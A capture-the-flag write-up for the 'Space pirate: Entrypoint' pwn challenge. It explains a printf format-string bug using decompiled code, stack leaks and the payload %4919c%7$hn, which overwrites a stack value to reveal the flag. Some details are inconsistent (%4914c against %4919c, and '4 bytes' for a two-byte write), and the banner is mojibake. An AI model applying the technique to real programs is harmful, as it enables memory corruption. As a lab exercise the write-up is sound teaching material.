Space pirate: Entrypoint
A standard FSB challenge
Initial Impressions
We are given a 64-bit binary file that upon running gives us two options.
âââ(kaliãŋkali)-[~/Desktop/CTF/PWN/htb_spacepirate_entrypoint]
ââ$ ./sp_entrypoint
Authentication System
ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ
ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ
ââââââââââ âââââââââââââââââââââââââââââââââââââââââ âââââââââ
ââââââââââ âââââââââââââââââââââââââââââââââââââââââ âââââââââ
ââââââââââ âââââââââââââââââââââââââââââââââââââââââ âââââââââ
ââââââââââ âââââââââââââââââââââââââââââââââââââââââââââââââââ âââââââââ
ââââââââââ ââââââââââââââââââââââââââââ â âââ âââ âââ âââ âââââââââ
ââââââââââ ââââââââââââââââââââââââââââ â âââ âââ âââ âââ âââââââââ
âââââââââââââââââââââââââââââââââââââââââââ âââ âââ âââ âââââââââââââââââ
âââââââââââââââââââââââââââââââââââââââââââ âââ âââ âââ âââââââââââââââââ
âââââââââââââââââââââââââââââââââââââââââââ âââ âââ âââ âââââââââââââââââ
âââââââââââââââââââââââââââââââââââââ âââââ âââ âââ âââ âââââââââââââââââ
âââââââââââââââââââââââââââââââââââââââââââ âââ âââ âââ âââââââââââââââââ
ââââââââââââ ââââââââââââ
âââââââââââââââââââââââââââââââââââââ âââââ âââ âââ âââ âââââââââââââââââ
ââââââââââââââââââââââââââââââââââââ ââââââ âââ âââ âââ âââââââââââââââââ
ââââââââââââââââââââââââââââââââââââ âââââ âââ âââ âââ âââââââââââââââââ
âââââââââââââââââââââââââââââââ âââ âââââ âââ âââ âââ âââââââââââââââââ
âââââââââââââââââââââââââââââââââââââââââââ âââââââââââââ âââââââââââââââââ
âââââââââââââââââââââââââââââââ âââ âââââ âââ âââ âââ âââââââââââââââââ
ââââââââââ ââââââââââââââââ âââ âââââ âââ âââ âââ âââ âââââââââ
ââââââââââ ââââââââââââ ââ âââ âââââ âââ âââ âââ âââ âââââââââ
ââââââââââ âââââââââââââââââââââââââââââââââââââââââââââââââââ âââââââââ
ââââââââââ âââââââââââââââââââââââââââââââââââââââââ âââââââââ
ââââââââââ âââââââââââââââââââââââââââââââââââââââââ âââââââââ
ââââââââââ âââââââââââââââââââââââââââââââââââââââââ âââââââââ
ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ
1. Scan card đŗ
2. Insert password âĒī¸
>
Looking at the decompiled main function in Ghidra, it gives us two functions of interest, open_door and check_pass.
main
undefined8 main(void)
{
long lVar1;
long in_FS_OFFSET;
long local_48;
long *local_40;
char local_38 [40];
long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28);
setup();
banner();
local_48 = 0xdeadbeef;
local_40 = &local_48;
printf(&DAT_001025e0);
lVar1 = read_num();
if (lVar1 != 1) {
if (lVar1 == 2) {
check_pass();
}
printf(&DAT_00102668,&DAT_0010259a);
/* WARNING: Subroutine does not return */
exit(0x1b39);
}
printf("\n[!] Scanning card.. Something is wrong!\n\nInsert card\'s serial number: ");
read(0,local_38,0x1f);
printf("\nYour card is: ");
printf(local_38);
if (local_48 == 0xdead1337) {
open_door();
}
else {
printf(&DAT_001026a0,&DAT_0010259a);
}
if (local_10 == *(long *)(in_FS_OFFSET + 0x28)) {
return 0;
}
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}The open_door() function prints out the flag to us while the check_pass() authenticates us if our input is 0nlyTh30r1g1n4lCr3wM3mb3r5C4nP455.
check_pass
void check_pass(void)
{
int iVar1;
long in_FS_OFFSET;
undefined8 local_28;
undefined8 local_20;
long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28);
local_28 = 0;
local_20 = 0;
printf("[*] Insert password: ");
read(0,&local_28,0xf);
iVar1 = strncmp("0nlyTh30r1g1n4lCr3wM3mb3r5C4nP455",(char *)&local_28,0x21);
if (iVar1 != 0) {
printf(&DAT_001025a8,&DAT_0010259a);
/* WARNING: Subroutine does not return */
exit(0x1b39);
}
open_door();
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return;
}However, that is impossible as the input is only accepting 15 bytes of input (Oxf).
Looking back at the main function, we see a possible FSB vulnerability on line 27 and 29 where our input is being displayed directly with printf.
This can be easily tested with %p which leaks a value of the stack.
1. Scan card đŗ
2. Insert password âĒī¸
> 1
[!] Scanning card.. Something is wrong!
Insert card's serial number: %p
Your card is: 0x7ffde61a8660We can also see that the variable declared earlier local_48 is on the stack 0xdeadbeef.
Exploit
To successfully get the flag, we need to
Leak the location of the pointer to
local_48on the stackOverwrite the contents of
local_48to be equivalent0xdead1337to pass the check
Using %p.%p.%p.%p.%p.%p.%p, we can see that local_48 is on the 6th position on the stack.
Insert card's serial number: %p.%p.%p.%p.%p.%p.%p.%p
Your card is: 0x7ffde61a8660.0x7fab257ed8c0.(nil).0xf.0x21676e6f72772073.0xdeadbeef.0x7ffde61aad00.0x70252e70252e7025With the use of pwndbg, we can see that the pointer to local_48 is on the 7th position on the stack 0x7fffffffdc68 pointing to 0x7fffffffdc60.
00:0000â rsp 0x7fffffffdc58 â⸠0x555555400d78 (main+130) ââ lea rdi, [rip + 0x18d9]
01:0008â 0x7fffffffdc60 ââ 0xdeadbeef
02:0010â 0x7fffffffdc68 â⸠0x7fffffffdc60 ââ 0xdeadbeef
03:0018â rsi 0x7fffffffdc70 â⸠0x7ffff7c10b40 ââ push rbp
04:0020â 0x7fffffffdc78 ââ 0x0
05:0028â 0x7fffffffdc80 â⸠0x555555400e20 (__libc_csu_init) ââ push r15
06:0030â 0x7fffffffdc88 â⸠0x555555400940 (_start) ââ xor ebp, ebp
07:0038â 0x7fffffffdc90 â⸠0x7fffffffdd80 ââ 0x1pwndbg> continue
Continuing.
%p.%p.%p.%p.%p.%p.%p
Your card is: 0x7fffffffb5c0.0x7ffff7bed8c0.(nil).0xf.0x21676e6f72772073.0xdeadbeef.0x7fffffffdc60We can then $hn to overwrite the last word (4 bytes) of 0xdeadbeef with %4914c which translates to 1337 in decimal., making local_48 = 0xdead1337.
The %n specifier takes in a pointer (memory address) and writes there the number of characters written so far. If we can control the input, we can control how many characters are written and also where we write to.
This makes our final payload %4919c%7$hn, with %7 referring to the pointer to local_48 and $hn referring to the beef portion of 0xdeadbeef which we are trying to overwrite.
Insert card's serial number: %4919c%7$hn
Your card is: īŋŊ
[+] Door opened, you can proceed with the passphrase: HTB{g4t3_0n3_d4rkn3e55_th3_w0rld_0f_p1r4t35}
Last updated